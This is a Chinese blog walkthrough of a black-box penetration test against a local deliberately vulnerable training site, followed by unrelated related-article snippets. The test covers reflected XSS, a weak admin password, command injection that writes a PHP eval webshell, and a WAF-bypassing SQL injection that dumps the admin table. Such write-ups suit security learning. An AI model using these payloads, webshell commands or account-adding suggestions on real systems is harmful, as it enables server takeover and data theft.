AVDemo漏洞平台黑盒测试

信息收集


说明一下:
因为是本地的环境,端口这些就不扫描了,

还有这个是某个dalao写的平台,也就检测不到什么cms了,

信息收集,端口,cms这些是必做的,

首先,这里先简单的使用轻量级扫描器扫描一下看看

images


可以看到扫描到了用户注册、用户登录、管理员登录等等,

还有一些302重定向,说明存在admin这个目录 ,

还有一些403无权限访问,也说明网站存在这些目录。


前台XSS

前台搜索留言处存在XSS ,

payload:

<script>alert(/xss/)</script>

images


管理员弱口令

管理员后台:www.xx.com/admin/login

简单测试 admin   admin 然后就进去了


后台命令执行

发现了一个奇怪的页面 ,

跟DVWA的很像有木有,可以执行命令

images


如果在渗透测试中,我们可以尝试使用 net user 命令来添加用户,

Linux下可以使用 useradd ,

要是对方开了远程桌面,添加用户直接就拿服务器了,

这里我就不测试了,我们来写shell看看 ,

命令:

127.0.0.1 && echo ^<?php eval($_POST[cmd]);?^> > D:/phpStudy/PHPTutorial/WWW/VAuditDemo/shell.php

知道网站路径的话可以写在那个目录都行,不过也得看看有没有访问权限,

然后直接上菜刀

images


然后菜刀上也经常使用虚拟终端来执行一些命令.

补充: 如果使用 dir 命令来指定某个路径查看文件,需要使用反斜杠


前台头像上传

注册一个test的账号,

然后在头像上传处,我们先拿一张普通的jpg文件测试一下,

发现没有返回什么路径之类的,审查元素也没发现什么路径。

images


然后传一个 shell.php 文件,发现被拦截了,

images


试了几个方法还是不行,然后看了处理上传的代码,

没有返回路径,文件名也挺复杂的,

条件限制没有什么好的方法,暂时先放弃了,

一般来说上传的文件一般在upload目录下,这个正好也在这个目录,但是文件名挺复杂了,

就先这样吧!!


前台sql注入

前台留言处发现通过id去搜索留言详情,

images


那么会不会存在注入,来测试一下

首先一个单引号,发现报错了,

images


输入 and 1=1 ,发现报错有一个 sqlwaf的词,判断存在waf,

应该是吃掉了一些关键字,那么 select ,union 等常见的关键字应该也不能直接用了,

images


既然 and 被吃了,那来试试 || ,

发现被替换成了空白符,

images


来试试大小写,发现也过滤了

images


来试试 /**/ 编码,发现报错了,

感情是被实体化了,

images


再来试试URL编码 %252f%252a 就是 /**/ 的意思,

发现 %百分号被斜杠转义了,

images


经过多次尝试后,回到上面 || 被替换成空,那么会不会有机会呢,

果然是可以的,但是超过列数了,

images


来逐渐删减一下,最后 4 的时候成功爆出显位,

images


然后来爆一下数据库,

images


然后想查一下表,发现_ 下划线被转换了,这个貌似没有什么好的绕过方法,

images


然后只能试试盲猜了,数据库一般都有 adminusers表,

发现 adminusers表都存在,但是 users表一般是存在普通用户的,所有我们直接看admin表,

没有报错说明存在

images


然后再去查爆字段,发现连id这个字段都没有????

最后无奈只能上数据库去查看,发现id这个字段其实是叫admin_id

下划线是无法绕的,只能用其他方法,

这里可以使用 *星号,星号在数据库是代表所有的意思,

但是这里必须要相同数量的字段才能查询,不然会报错,

而 admin这个表字段刚好是三个,然后就直接爆出数据了,

images


附1:常见状态码

  1. 200   OK   请求成功。一般用于GET与POST请求
  2. 301   Moved Permanently   被请求的资源已永久移动到新位置
  3. 302   Found   临时移动。与301类似。但请求的资源现在临时从不同的 URL 响应请求。
  4. 401   Unauthorized   当前请求需要用户验证。
  5. 403   Forbidden   服务器理解请求客户端的请求,但是拒绝执行此请求
  6. 404   Not Found   所请求的资源(网页)不存在或已被删除。
  7. 500   Internal Server Error   服务器内部错误,无法完成请求
  8. 502   Bad Gateway   作为网关或者代理工作的服务器尝试执行请求时,从远程服务器接收到了一个无效的响应
  9. 503   Service Unavailable   由于超载或系统维护,服务器暂时的无法处理客户端的请求。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/707469.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

SuperMap iDesktopX 对河流面等分并分段渲染

作者&#xff1a;lzzzz 前言 在项目场景中&#xff0c;可能会遇到一条河流中要分段渲染不同的水深&#xff0c;水质指数等&#xff0c;这时&#xff0c;就需要对河流面进行等分操作&#xff0c;手动绘制工作量又较大&#xff0c;因此&#xff0c;我们实践了使用SuperMap iDeskt…

【MATLAB】fminsearchbnd()函数安装包下载

fminsearchbnd()函数 链接&#xff1a;https://pan.baidu.com/s/1apc6_f92rDnV_NwHpZZpDQ?pwdxul8 提取码&#xff1a;xul8 fminsearchbnd, fminsearchcon - File Exchange - MATLAB Central (mathworks.cn) 若链接失效&#xff0c;可以自行注册下载&#xff0c;操作也很简…

计算机网络学习记录 数据链路层 Day3 (上)

计算机网络学习记录 数据链路层 Day3&#xff08;上&#xff09; 你好,我是Qiuner. 为记录自己编程学习过程和帮助别人少走弯路而写博客 这是我的 github https://github.com/Qiuner gitee https://gitee.com/Qiuner 如果本篇文章帮到了你 不妨点个赞吧~ 我会很高兴的 &#x1…

手机IP地址:固定还是动态?探寻背后的变化之谜

在数字化时代的今天&#xff0c;手机作为我们日常生活中必不可少的通讯工具&#xff0c;扮演着越来越重要的角色。其中&#xff0c;IP地址作为手机在网络世界中的“身份证”&#xff0c;对于手机的正常运作至关重要。然而&#xff0c;很多人对于手机IP地址的固定性存在疑问&…

Axure RP 9 for Mac:强大的原型设计利器

Axure RP 9 for Mac是一款功能强大的原型设计工具&#xff0c;专为Mac用户打造。它支持高保真度的应用程序和网站原型设计&#xff0c;帮助用户快速创建高质量的产品原型。软件内置丰富的交互效果和动画设计选项&#xff0c;设计师可以通过简单的操作&#xff0c;为原型添加各种…

LeetCode-Pow(x, n)【递归 数学】

[TOC](LeetCode-Pow(x, n)【递归 数学】) 题目描述&#xff1a; 实现 pow(x, n) &#xff0c;即计算 x 的整数 n 次幂函数&#xff08;即&#xff0c;xn &#xff09;。 示例 1&#xff1a; 输入&#xff1a;x 2.00000, n 10 输出&#xff1a;1024.00000 示例 2&#xf…

Excel表格内容误删未保存怎么找回?5种XLS文件恢复有效方法

在繁忙的工作中Excel表格作为数据处理的重要工具&#xff0c;承载了众多关键信息。然而误删未保存的Excel内容往往让人措手不及。今天我将为大家分析Excel表格内容误删未保存的可能原因&#xff0c;并提供五个免费实用的解决方案&#xff0c;助你轻松找回误删的XLS文件数据。 一…

开发一个Rshiny应用(基础)

Introduction Shiny 是一个 R 包&#xff0c;可轻松地直接从 R 构建交互式 Web 应用程序。还可以在网页上托管独立应用程序或将它们嵌入 R Markdown 文档或构建仪表板&#xff0c;还可以使用 CSS 主题、html 小部件和 JavaScript 操作扩展您的 Shiny 应用程序。 #first app l…

Linux中的计划任务(crontab)详解

&#x1f407;明明跟你说过&#xff1a;个人主页 &#x1f3c5;个人专栏&#xff1a;《Linux &#xff1a;从菜鸟到飞鸟的逆袭》&#x1f3c5; &#x1f516;行路有良友&#xff0c;便是天堂&#x1f516; 目录 一、前言 1、Linux的起源与发展 2、什么是计划任务&#xf…

05-应用级开发者 AI 时代破局点

后端应用级开发者该如何拥抱 AI GC&#xff1f;就是在这样的一个大的浪潮下&#xff0c;我们的传统的应用级开发者。我们该如何选择职业或者是如何去快速转型&#xff0c;跟上这样的一个行业的一个浪潮? 0 AI金字塔模型 越往上它的整个难度就是职业机会也好&#xff0c;或者说…

宝藏级丨图解项目管理全流程(上篇)

《项目管理知识体系指南》的定义&#xff1a;项目是为创造独特的产品、服务或成果而进行的临时性工作。项目管理就是将各种知识、技能、工具与技术应用于项目活动&#xff0c;以满足项目的要求。项目管理的全流程包括以下几个阶段&#xff1a; 项目启动阶段。这是开始一个新项…

【SQL】SQL常见面试题总结(4)

目录 1、空值处理1.1、统计有未完成状态的试卷的未完成数和未完成率1.2、0 级用户高难度试卷的平均用时和平均得分 2、高级条件语句2.1、筛选限定昵称成就值活跃日期的用户&#xff08;较难&#xff09;2.2、筛选昵称规则和试卷规则的作答记录&#xff08;较难&#xff09;2.3、…